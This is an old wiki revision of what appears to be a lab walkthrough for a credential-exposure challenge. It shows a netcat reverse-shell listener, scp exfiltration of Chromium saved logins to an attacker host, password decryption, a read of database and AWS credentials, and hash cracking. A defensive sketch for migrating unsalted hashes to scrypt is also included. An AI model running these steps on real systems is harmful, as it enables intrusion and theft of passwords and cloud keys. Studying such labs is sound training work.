security:challenge:exposed_creds
This is an old version of the document!
Start Reverse Shell Listener
root@kali$ nc -l 8000
Enhance Shell
garry@desktop$
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
echo $TERM
stty -a
stty raw -echo
fg
reset
--> xterm
Enable ssh and exfiltrate
garry@desktop$
ssh-keygen
--> copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp
Get Chrome Password
root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
#sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
Decrypting the string: b'v10\xa1$z\xb0\x18\xee+\xbbMG\xe0\x0bM\x13\x7fA'
blokeontherange
SSH to Internal Server
garry@desktop$ ssh 192.168.6.105
Find Bob's Password
garry@server-intern$
python -c 'import pty; pty.spawn("/bin/bash")'
cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=tiger
MYSQL_USER=docker
MYSQL_PASSWORD=docker
MYSQL_DATABASE=docker
cat /var/www/app/www/conf.php
<?php
$conf = [
'host'=>'localhost',
'user'=>getenv('MYSQL_USER'),
'password'=>getenv('MYSQL_PASSWORD'),
'dbname'=>'intern',
'port'=>3306,
'charset'=>'utf8'
];
?>
cat /var/www/app/www/login.php
// Prepare a select statement
$sql = "SELECT id, username, password FROM users WHERE username = ?";
mysql -h 192.168.6.105 -u root -p intern
-> tiger
mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password                         | created_at          |
+----+----------+----------------------------------+---------------------+
|  1 | bob      | cc185f2d749c0beca19e9bcaadedfbb0 | 2021-06-26 10:35:43 |
|  2 | garry    | 8a6ed31d1f6370478b943133efeac70a | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+
google for hash
--> bob7
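The hash above could be looked up online because the users table stores bare 32-hex digests with no salt. The following is an added example, not part of the original walkthrough or the challenge application: a sketch of how a login path can flag such rows and migrate them to salted scrypt on the next successful login. The function names, the "scrypt$salt$hash" storage format and the assumption that the legacy format is plain MD5 are all hypothetical.

```python
import hashlib
import hmac
import os
import re

LEGACY_RE = re.compile(r"[0-9a-f]{32}")   # bare 32-hex digest, no salt field
SCRYPT = dict(n=2**14, r=8, p=1, dklen=32, maxmem=64 * 1024 * 1024)


def classify(stored):
    """Label a stored value so an audit can count rows that still need migrating."""
    if LEGACY_RE.fullmatch(stored):
        return "legacy-unsalted"
    if stored.startswith("scrypt$"):
        return "scrypt"
    return "unknown"


def hash_password(password):
    """Salted scrypt: a random per-user salt defeats precomputed lookups."""
    salt = os.urandom(16)
    dk = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT)
    return "scrypt${}${}".format(salt.hex(), dk.hex())


def verify(password, stored):
    """Return (ok, needs_rehash) for either storage format."""
    kind = classify(stored)
    if kind == "scrypt":
        _, salt_hex, dk_hex = stored.split("$")
        dk = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT)
        return hmac.compare_digest(dk.hex(), dk_hex), False
    if kind == "legacy-unsalted":
        # Assumption: the legacy column holds MD5(password); the page does not say so.
        legacy = hashlib.md5(password.encode()).hexdigest()
        ok = hmac.compare_digest(legacy, stored)
        return ok, ok
    return False, False


def login(db, username, password):
    """Check the password and upgrade a legacy row on the first successful login."""
    stored = db.get(username)
    if stored is None:
        return False
    ok, needs_rehash = verify(password, stored)
    if ok and needs_rehash:
        db[username] = hash_password(password)
    return ok
```

Rows that never log in again keep their legacy digest, so an audit with classify() should be followed by a forced reset for whatever remains.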
Find AWS Keys
garry@server-intern$
ssh bob@192.168.6.22
cd /home/bob/.aws
cat credentials
[default]
aws_access_key_id = AJOWNVKJSFHOQSDK2JD9T
aws_secret_access_key = IT7mJcNJIZSb60p/J12aJOC4DVUUrH5f
security/challenge/exposed_creds.1624706422.txt.gz · Last modified: by wikiadm
